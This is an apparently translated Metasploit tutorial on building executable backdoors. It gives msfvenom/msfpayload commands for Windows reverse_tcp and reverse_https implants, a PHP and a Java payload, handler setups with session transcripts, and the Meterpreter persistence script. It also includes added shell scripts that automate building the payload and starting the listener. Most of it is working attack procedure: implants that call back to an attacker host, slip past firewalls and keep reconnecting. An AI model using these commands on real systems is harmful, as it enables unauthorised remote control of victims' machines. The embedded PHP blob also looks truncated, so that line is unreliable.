Metasploit executable backdoors

Contents

msfpayload as shellcode

persistence


It can generate backdoors for Linux, Windows, PHP, ASP, JSP and more.


msfpayload as shellcode

View the full list (248 payloads at the time of writing):

root@kali:/home/brk# msfpayload -l


It can generate many kinds. Put simply, a normal Windows backdoor uses windows/meterpreter/reverse_tcp:

msfpayload windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=8080 R | \
  msfencode -b '' -t exe -o /var/www/meterpreter.exe


Once it is generated and the target runs it, we need a listener on our side to receive the shell:

msf > use exploit/multi/handler
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST 5.5.5.1
LHOST => 5.5.5.1
msf  exploit(handler) > set LPORT 8080
LPORT => 8080
msf  exploit(handler) > exploit 

[*] Started reverse handler on 5.5.5.1:8080
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 5.5.5.3
[*] Meterpreter session 1 opened (5.5.5.1:8080 -> 5.5.5.3:1055) at 2020-03-21 23:26:58 +0800

meterpreter >

Others (php, asp, jsp, dll)

Pick the msfpayload you want, generate it, and it's good to go. For example:

DLL (shown as a screenshot in the original; not reproduced here):

PHP:

 msf payload(bind_php) > generate -t raw -e php/base64
eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK));

Java (msfpayload's W output format is a WAR archive, written here to a .jar):

 ./msfpayload java/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=4444 W > /tmp/job.jar


Unusual Windows backdoors

Where there are normal ones there are of course unusual ones, for example reverse_https and reverse_http.
Everyone knows these walk straight through firewalls, because the traffic looks like ordinary outbound HTTP(S). Unlike reverse_tcp, a reverse_http(s) agent keeps calling back, so when a connection drops unexpectedly we can pick it up again, much like Huigezi (灰鸽子). By default the handler gives up on a session after 5 minutes without communication (SessionCommunicationTimeout, 300 seconds); set it to 0 and the session never times out. The separate SessionExpirationTimeout controls how long the agent itself keeps trying (one week by default, 0 for no expiry).

brk@Dis9Team:~$ sudo msfvenom -p windows/meterpreter/reverse_https -f exe LHOST=5.5.5.1 LPORT=1111 > https.exe
brk@Dis9Team:~$ file https.exe
https.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

Now run it.

msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf  exploit(handler) > set LHOST 5.5.5.1
LHOST => 5.5.5.1
msf  exploit(handler) > set LPORT 1111
LPORT => 1111
msf  exploit(handler) > set SessionCommunicationTimeout 0
SessionCommunicationTimeout => 0
msf  exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf  exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://5.5.5.1:1111/
msf  exploit(handler) > [*] Starting the payload handler...
[*] 5.5.5.3:1060 Request received for /AauE...
[*] 5.5.5.3:1060 Staging connection for target /AauE received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 2 opened (5.5.5.1:1111 -> 5.5.5.3:1060) at 2020-03-21 23:40:06 +0800

Success. The file was clicked twice, so we got two sessions. Let's kill them:

msf  exploit(handler) > sessions 

Active sessions
===============

  Id  Type                   Information                    Connection
  --  ----                   -----------                    ----------
  2   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1  5.5.5.1:1111 -> 5.5.5.3:1060 (5.5.5.3)
  3   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1  5.5.5.1:1111 -> 5.5.5.3:1118 (5.5.5.3)
msf  exploit(handler) > sessions -k 2
[*] Killing session 2
[*] Meterpreter session 2 closed.
msf  exploit(handler) > sessions -k 3
[*] Killing session 3
[*] Meterpreter session 3 closed.
msf  exploit(handler) > sessions 

Active sessions
===============

No active sessions.

msf  exploit(handler) >

Listen again:

msf  exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://5.5.5.1:1111/
[*] Starting the payload handler...
msf  exploit(handler) > [*] 5.5.5.3:1280 Request received for /AauE...
[*] 5.5.5.3:1280 Staging connection for target /AauE received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 4 opened (5.5.5.1:1111 -> 5.5.5.3:1280) at 2012-03-21 23:45:57 +0800

And a session comes back on its own: the agent keeps calling back even after its previous session was killed.
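As an added example (not code from the original post), the script below ties the payload build and the listener together so that PAYLOAD, LHOST and LPORT cannot drift apart between msfvenom and multi/handler. It emits the msfvenom command and a msfconsole resource file that reproduces the interactive handler setup shown above, for the reverse_tcp case as well as the reverse_https one, with ExitOnSession and both session timeouts set explicitly. The defaults (the reverse_https payload, 5.5.5.1, port 1111, https.exe) are assumptions mirroring this page's run and can be overridden from the environment:

```shell
#!/bin/sh
# Added example, not code from the original post. One set of variables drives
# both the msfvenom build and the multi/handler resource script, so PAYLOAD,
# LHOST and LPORT cannot drift apart. The defaults below mirror the page's
# reverse_https run; they are assumptions, override them from the environment.

PAYLOAD="${PAYLOAD:-windows/meterpreter/reverse_https}"
LHOST="${LHOST:-5.5.5.1}"
LPORT="${LPORT:-1111}"
OUT="${OUT:-https.exe}"

# Accept only a numeric TCP port in 1-65535.
valid_port() {
    case "$1" in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# The msfvenom command that builds the executable (msfvenom replaced the
# msfpayload | msfencode pipeline used earlier on the page).
venom_cmd() {
    printf 'msfvenom -p %s LHOST=%s LPORT=%s -f exe -o %s\n' "$1" "$2" "$3" "$4"
}

# A msfconsole resource file reproducing the interactive handler setup above:
#   ExitOnSession false          keep listening after the first session
#   SessionCommunicationTimeout  the handler drops a silent session after 300 s
#                                by default; 0 disables that
#   SessionExpirationTimeout     the agent stops calling back after one week
#                                by default; 0 disables that
#   exploit -j                   run the handler as a background job
handler_rc() {
    cat <<EOF
use exploit/multi/handler
set PAYLOAD $1
set LHOST $2
set LPORT $3
set ExitOnSession false
set SessionCommunicationTimeout 0
set SessionExpirationTimeout 0
exploit -j
EOF
}

main() {
    if ! valid_port "$LPORT"; then
        echo "LPORT must be 1-65535, got: $LPORT" >&2
        return 1
    fi
    echo "# 1. build the payload:"
    venom_cmd "$PAYLOAD" "$LHOST" "$LPORT" "$OUT"
    echo "# 2. save the following as handler.rc and start it with: msfconsole -q -r handler.rc"
    handler_rc "$PAYLOAD" "$LHOST" "$LPORT"
}

main "$@"
```

`msfconsole -r` replays the resource file line by line at startup, which is exactly what the interactive `set ...`/`exploit -j` sequence above does by hand. With both timeouts at 0 a killed or dropped session comes back as long as the agent process is alive, which is the behaviour shown after `sessions -k`; on a real engagement put a finite SessionExpirationTimeout there so the implant does not outlive the authorisation.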

persistence

This is a post-exploitation Meterpreter script, so you need an existing session first. It drops a persistent backdoor on the target and can register it to start at boot, at logon, or as a system service.
Attach to the session and look at the help first:

msf  exploit(handler) > sessions -i 4
meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching multi/handler to connect to the agent
    -L   Location in target host where to write payload to, if none %TEMP% will be used.
    -P   Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T   Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i   The interval in seconds between each connection attempt
    -p   The port on the remote host where Metasploit is listening
    -r   The IP of the system running Metasploit listening for the connect back

meterpreter >

Now run it:

meterpreter > run persistence -A -L c:\\windows\\ -x -i 5 -p 1234 -r 5.5.5.1
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=1234
[*] Persistent agent script is 609512 bytes long
[+] Persistent Script written to c:\windows\\FBEzRzQYpXKFg.vbs
[*] Starting connection handler at port 1234 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Executing script c:\windows\\FBEzRzQYpXKFg.vbs
[+] Agent executed with PID 3280
meterpreter >

The agent was written to c:\windows as a .vbs and calls back to port 1234 on our host 5.5.5.1 every 5 seconds. One caveat: the script's flags are case-sensitive, and the boot-time autostart option is -X (upper case). The lowercase -x used above is not one of the flags in the help, and the output shows no autorun registration line, so this agent was only executed once (PID 3280) and will not survive a reboot. Rerun with -X (or -U for logon, or -S for a service, which needs administrative rights) to actually persist.
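Two checks a practitioner wants around this run, as an added example (not code from the original post): validate the flags before running the script, since they are case-sensitive and the lowercase -x in the command above is not one of the flags listed in the help, and turn the script's transcript into the Meterpreter commands that remove the agent afterwards. The flag table is taken from the help output above; the embedded transcript is this page's own output, included as a constructed sample so the script runs offline:

```shell
#!/bin/sh
# Added example, not code from the original post. Two checks around a
# persistence run: validate the (case-sensitive) flags before running the
# script, and turn its transcript into the Meterpreter commands that undo it.
# The flag table comes from the script's help output; the transcript below is
# the page's own output, embedded here as a constructed sample.

VALUE_FLAGS="-r -p -i -L -T -P"   # options that take an argument
SWITCH_FLAGS="-h -X -U -S -A"     # bare switches

# Print every argument that looks like a flag but is not one the script knows.
# The lowercase -x used on the page is not -X and so is reported here.
unknown_persistence_flags() {
    skip=0
    for a in "$@"; do
        if [ "$skip" = 1 ]; then skip=0; continue; fi
        case " $VALUE_FLAGS " in *" $a "*) skip=1; continue ;; esac
        case " $SWITCH_FLAGS " in *" $a "*) continue ;; esac
        case "$a" in -*) printf '%s\n' "$a" ;; esac
    done
}

# True if the argument list asks for any autostart (-X boot, -U logon,
# -S service). Without one of these the agent runs once and is gone on reboot.
autostart_requested() {
    for a in "$@"; do
        case "$a" in -X|-U|-S) return 0 ;; esac
    done
    return 1
}

# Constructed sample: the persistence output shown on this page.
SAMPLE_TRANSCRIPT='[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=1234
[*] Persistent agent script is 609512 bytes long
[+] Persistent Script written to c:\windows\\FBEzRzQYpXKFg.vbs
[*] Starting connection handler at port 1234 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Executing script c:\windows\\FBEzRzQYpXKFg.vbs
[+] Agent executed with PID 3280'

# Meterpreter commands that remove what the transcript reports: kill the
# agent process first, then delete the dropped VBS.
cleanup_commands() {
    printf '%s\n' "$1" | awk '
        /Persistent Script written to/ { dropped = $NF }
        /Agent executed with PID/      { pid = $NF }
        END {
            if (pid != "")     print "kill " pid
            if (dropped != "") print "rm " dropped
        }
    '
}

# Path of the cleanup resource file the script recorded on the attacker box;
# it can be replayed inside the session with: resource <path>
cleanup_rc_path() {
    printf '%s\n' "$1" | awk '/Resource file for cleanup created at/ { print $NF }'
}

main() {
    bad=$(unknown_persistence_flags -A -L 'c:\windows\' -x -i 5 -p 1234 -r 5.5.5.1)
    [ -n "$bad" ] && echo "unknown flag(s), check the case: $bad"
    autostart_requested -A -L 'c:\windows\' -x -i 5 -p 1234 -r 5.5.5.1 \
        || echo "no -X/-U/-S given: the agent will not survive a reboot"
    echo "cleanup commands for the recorded run:"
    cleanup_commands "$SAMPLE_TRANSCRIPT"
    echo "or replay the script's own cleanup file: resource $(cleanup_rc_path "$SAMPLE_TRANSCRIPT")"
}

main "$@"
```

Keep the cleanup commands (or the .rc path the script prints) with the engagement notes: the dropped .vbs in c:\windows and the running agent are the artifacts that must be gone when the engagement ends.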